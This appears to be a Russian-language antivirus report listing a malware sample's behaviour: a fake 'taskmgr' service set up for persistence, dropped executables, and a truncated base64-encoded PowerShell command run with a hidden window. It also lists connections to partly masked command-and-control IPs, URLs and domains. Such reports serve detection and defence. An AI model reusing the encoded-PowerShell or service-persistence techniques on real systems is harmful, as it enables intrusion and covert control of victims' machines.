Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\taskmgr] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\taskmgr] 'ImagePath' = '"%WINDIR%\SysWOW64\NlsData0000\taskmgr.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB3AG8AYQByAGMAYQBlAHkAZgB1AHUAbgA9ACcAZgBvAGUAYwBxAHUAaQBzACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAVQBSAEkAdABgAFkAUABgAFIAbwB0AE8AQwBgAG...
- %HOMEPATH%\262.exe
- %WINDIR%\syswow64\nlsdata0000\taskmgr.exe
- %HOMEPATH%\262.exe в %WINDIR%\syswow64\nlsdata0000\taskmgr.exe
- '94.##.254.194':80
- '21#.#1.142.238':8080
- http://www.mp###rat.com/cgi-bin/ncua/
- http://21#.##.142.238:8080/4uvnX1w5THXHCm/SGBHaErWQx8azUrwrfM/zFV2spbO8nZOlrAy6/2U4n7Cf2KreIeRA8M7/uSZ8AR2jQjYiY/ via 21#.#1.142.238
- DNS ASK ph#####ninjarank.com
- DNS ASK mp###rat.com
- '%HOMEPATH%\262.exe'
- '%WINDIR%\syswow64\nlsdata0000\taskmgr.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB3AG8AYQByAGMAYQBlAHkAZgB1AHUAbgA9ACcAZgBvAGUAYwBxAHUAaQBzACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAVQBSAEkAdABgAFkAUABgAFIAbwB0AE8AQwBgAG...' (со скрытым окном)